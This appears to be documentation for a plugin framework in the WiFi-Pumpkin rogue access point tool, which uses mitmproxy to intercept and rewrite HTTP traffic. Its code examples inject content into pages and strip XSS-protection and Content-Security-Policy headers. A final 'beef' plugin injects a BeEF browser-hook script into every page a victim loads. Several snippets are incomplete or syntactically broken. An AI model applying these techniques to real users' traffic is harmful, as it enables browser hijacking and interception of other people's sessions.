
my implements transparent proxies (mitmproxy) can use to intercept and manipulate HTTP traffic modifying requests and responses. CLI

Primary LanguagePythonMIT LicenseMIT


my implements transparent proxies (mitmproxy) can use to intercept and manipulate HTTP traffic modifying requests and responses.


$ sudo apt-get update
$ sudo apt-get install -y python-pip libffi-dev
$ libssl-dev libxml2-dev libxslt1-dev zlib1g-dev
$ sudo apt-get install -y python-qt4
$ sudo apt-get install -y python-dev git
$ sudo apt-get install -y libpcap-dev
$ sudo pip install -r requirements.txt
$ sudo pip install mitmproxy==0.18.2

Transparent proxies(mitmproxy) that you can use to intercept and manipulate HTTP traffic modifying requests and responses, that allow to inject javascripts into the targets visited. You can easily implement a module to inject data into pages creating a python file in directory "plugins/" automatically will be loaded.

Plugins Example Dev

from mitmproxy.models import decoded # for decode content html
from plugins.extension.plugin import PluginTemplate

class Nameplugin(PluginTemplate):
   meta = {
       'Name'      : 'Nameplugin',
       'Version'   : '1.0',
       'Description' : 'Brief description of the new plugin',
       'Author'    : 'by dev'
   def __init__(self):
       for key,value in self.meta.items():
           self.__dict__[key] = value
       # if you want set arguments check refer wiki more info.
       self.ConfigParser = False # No require arguments

   def request(self, flow):
       print flow.__dict__
       print flow.request.__dict__
       print flow.request.headers.__dict__ # request headers
       host = flow.request.pretty_host # get domain on the fly requests
       versionH = flow.request.http_version # get http version

       # get redirect domains example
       # pretty_host takes the "Host" header of the request into account,
       if flow.request.pretty_host == "example.org":
           flow.request.host = "mitmproxy.org"

       # get all request Header example
       self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]".format(self.Name))
       for name, valur in flow.request.headers.iteritems():
           self.send_output.emit('{}: {}'.format(name,valur))

       print flow.request.method # show method request
       # the model printer data
       self.send_output.emit('[NamePlugin]:: this is model for save data logging')

   def response(self, flow):
       print flow.__dict__
       print flow.response.__dict__
       print flow.response.headers.__dict__ #convert headers for python dict
       print flow.response.headers['Content-Type'] # get content type

       #every HTTP response before it is returned to the client
       with decoded(flow.response):
           print flow.response.content # content html
           flow.response.content.replace('</body>','<h1>injected</h1></body>') # replace content tag

       del flow.response.headers["X-XSS-Protection"] # remove protection Header

       flow.response.headers["newheader"] = "foo" # adds a new header
       #and the new header will be added to all responses passing through the proxy


First of all write the import plugin tamplate

from plugins.extension.plugin import PluginTemplate

the basic plugin example:

from plugins.extension.plugin import PluginTemplate

class Example(PluginTemplate):
    meta = {
        'Name'      : 'exampleplugin',
        'Version'   : '1.0',
        'Description' : 'description of plugin',
        'Author'    : 'by dev Name',

    def __init__(self):
        for key,value in self.meta.items():
            self.__dict__[key] = value
        self.ConfigParser = False # requeire args

    def request(self, flow): # get all request HTTP traffic

    def response(self, flow): # get all response HTTP traffic

Modify Packets

Simple fuctions that just adds a header to every request..

   def response(self, flow):
       flow.response.headers["newheader"] = "foo" # adds a new header

example from mitmproxy how to redirect connections (IP spoofing)

   def request(self, flow):
       if flow.client_conn.ssl_established:
           flow.request.scheme = "https"
           sni = flow.client_conn.connection.get_servername()
           port = 443
           flow.request.scheme = "http"
           sni = None
           port = 80

       host_header = flow.request.pretty_host
       m = parse_host_header.match(host_header)
       if m:
           host_header = m.group("host").strip("[]")
           if m.group("port"):
               port = int(m.group("port"))

       flow.request.host = sni or host_header
       flow.request.port = port

another example how to rewrite packet in real time

from mitmproxy.models import decoded # for decode content html
from plugins.extension.plugin import PluginTemplate

class Nameplugin(PluginTemplate):
   meta = {
       'Name'      : 'Nameplugin',
       'Version'   : '1.0',
       'Description' : 'Brief description of the new plugin',
       'Author'    : 'by dev'
   def __init__(self):
       for key,value in self.meta.items():
           self.__dict__[key] = value
       # if you want set arguments check refer wiki more info.
       self.ConfigParser = False # No require arguments

   def request(self, flow):
       print flow.__dict__
       print flow.request.__dict__
       print flow.request.headers.__dict__ # request headers
       host = flow.request.pretty_host # get domain on the fly requests
       versionH = flow.request.http_version # get http version

       # get redirect domains example
       # pretty_host takes the "Host" header of the request into account,
       if flow.request.pretty_host == "example.org":
           flow.request.host = "mitmproxy.org"

       # get all request Header example
       self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]".format(self.Name))
       for name, valur in flow.request.headers.iteritems():
           self.send_output.emit('{}: {}'.format(name,valur))

       print flow.request.method # show method request
       # the model printer data
       self.send_output.emit('[NamePlugin]:: this is model for save data logging')

   def response(self, flow):
       print flow.__dict__
       print flow.response.__dict__
       print flow.response.headers.__dict__ #convert headers for python dict
       print flow.response.headers['Content-Type'] # get content type

       #every HTTP response before it is returned to the client
       with decoded(flow.response):
           print flow.response.content # content html
           flow.response.content.replace('</body>','<h1>injected</h1></body>') # replace content tag

       del flow.response.headers["X-XSS-Protection"] # remove protection Header

       flow.response.headers["newheader"] = "foo" # adds a new header
       #and the new header will be added to all responses passing through the proxy


if you want to save data(pumpkin-prxoy.log) in your plugin, just use self.send_output.emit('msg here')

   def request(self, flow):
       self.send_output.emit('[example]:: this is hellow WiFi-Pumpkin')

How to add argumments

Now, if you want to add argumments in proxy.ini, you need to add in directory "core/pumpkinProxy.ini" the key (exampleplugin and set_exampleplugin).

  • exampleplugin key is the option checkbox to change and enable or disable plugin
  • set_exampleplugin this is key for search all argumments in Settings option. plugin_key

Example from WiFi-Pumpkin with Argummets

class beef(PluginTemplate):
    meta = {
        'Name'      : 'beef',
        'Version'   : '1.0',
        'Description' : 'this module proxy inject hook beef api url.[Hook URL]',
        'Author'    : 'Marcos Nesster'
    def __init__(self):
        for key,value in self.meta.items():
            self.__dict__[key] = value
        self.ConfigParser = True
        self.urlhook = self.config.get_setting('set_beef','hook')

    def request(self, flow):

    def response(self,flow):
        with decoded(flow.response):  # Remove content encoding (gzip, ...)
            html = BeautifulSoup(flow.response.content)
            # To Allow CORS
            if "Content-Security-Policy" in flow.response.headers:
                del flow.response.headers["Content-Security-Policy"]
            if html.body:
                script = html.new_tag(
                html.body.insert(0, script)
                flow.response.content = str(html)
                self.send_output.emit("[{}] Injected BeFF url hook...".format(self.Name))